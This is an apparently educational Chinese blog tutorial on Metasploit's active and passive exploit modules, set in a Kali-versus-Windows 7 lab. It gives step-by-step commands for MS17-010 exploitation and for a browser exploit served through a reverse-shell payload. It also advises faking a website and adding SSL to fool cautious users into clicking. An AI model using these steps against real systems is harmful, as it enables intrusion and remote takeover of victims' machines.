【MSFconsole进阶】exploits(渗透攻击模块):Active Exploit(主动渗透攻击)、Passive Exploit(被动渗透攻击)

目录

exploits(渗透攻击模块)

一、简介:

二、Active Exploit(主动渗透攻击)

2.1、前提:

2.2、示例:

2.2.1、实验环境:

2.2.2、第一步:信息收集

2.2.3、第二步:测试目标是否在线

2.2.4、第三步:测试漏洞为ms17_010

2.2.5、第四步:进入到会话,执行

三、Passive Exploit(被动渗透攻击)

3.1、简介:

3.2、示例

3.2.1、实验环境:

3.2.2、第一步:装载模块

3.2.3、第二步:

3.2.4、第三步:诱使目标点击

3.2.5、第四步:进入会话



 

exploits(渗透攻击模块)

一、简介:

利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法

分为主动(Active Exploit)、被动(Passive Exploit)

确实挺多的

 



 

二、Active Exploit(主动渗透攻击)

2.1、前提:

发现服务--->寻找漏洞

目标开启了某种服务,并且这个服务存在漏洞

2.2、示例:

2.2.1、实验环境:

目标关闭防火墙

目标:Windows 7 旗舰版 Service Pack 1 。IP地址为192.168.190.138

攻击机:Kali 。IP地址为192.168.190.131


2.2.2、第一步:信息收集

使用nmap扫描目标主机看是否存在常见漏洞

db_nmap --script=vuln 192.168.190.138

结果

Risk factor: HIGH 

风险因素:高

A critical remote code execution vulnerability exists in Microsoft SMBv1

Microsoft SMBV1中存在关键的远程代码执行漏洞

servers (ms17-010)


2.2.3、第二步:测试目标是否在线

使用辅助模块auxiliary

# 装载具体模块

use auxiliary/scanner/discovery/arp_sweep

#可以查看相关命令

show options

# 设置模块(目标、速度)

set rhosts 192.168.190.138

# 设置线程

set threads 250

# 启动模块

run

如果扫不出来,就可能是有防火墙(我是提前关了防火墙的) 


2.2.4、第三步:测试漏洞为ms17_010

# 使用ms17的漏洞利用模块

use exploit/windows/smb/ms17_010_psexec

# 查看使用方法

show options

# 设置

set rhosts 192.168.190.138

# 执行漏洞攻击

run

Unable to find accessible named pipe!

无法找到可访问的命名管!

 Exploit completed, but no session was created.

漏洞利用完成,但未创建会话。

(如果创建成功再执行第四步)


2.2.5、第四步:进入到会话,执行

#可以查看已经创建的会话

session -l

#进入这个对应的shell

sessions -i ID

再执行自己想执行的命令



三、Passive Exploit(被动渗透攻击)

3.1、简介:

浏览器软件漏洞攻击和文件格式漏洞攻击,引诱目标用户打开触发。

#查看支持的渗透攻击模块

show exploits    

3.2、示例

3.2.1、实验环境:

目标开启防火墙

目标:Windows 7 旗舰版 Service Pack 1 。IP地址为192.168.190.138

攻击机:Kali 。IP地址为192.168.190.131

现在使用(主动攻击)Active进行攻击不会成功

使用(被动攻击)Passive,构造链接,诱使目标连接,利用浏览器的漏洞


3.2.2、第一步:装载模块

挂载模块

use exploit/windows/browser/ms07_017_ani_loadimage_chunksize

show options
 


3.2.3、第二步:

伪造网站,诱使目标打开

SRVHOST可以指定为本机的IP地址,我们也可以打开SSL和设置SSL的证书,迷惑有安全意识的用户

URIPATH是访问的URL地址,可手动指定,比如192.168.190.131/service(一般默认根目录)


#设置

set SRVHOST 192.168.190.131

set PAYLOAD windows/shell/reverse_tcp

set LHOST 192.168.190.131

exploit


3.2.4、第三步:诱使目标点击

伪造了一个存在漏洞利用代码的WEB站点,这个站点等待浏览器版本存在漏洞的用户去访问它,将exploit注入到浏览器进程中,利用浏览器漏洞执行payload

我们在目标PC上用不同浏览器访问这个URL

访问以后,就会有记录,并尝试建立连接

没有后续就是可能没有相关已知的漏洞,一直处于等待阶段


3.2.5、第四步:进入会话

#可以查看已经创建的会话

session -l

#进入这个对应的shell

sessions -i ID

再执行自己想执行的命令

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值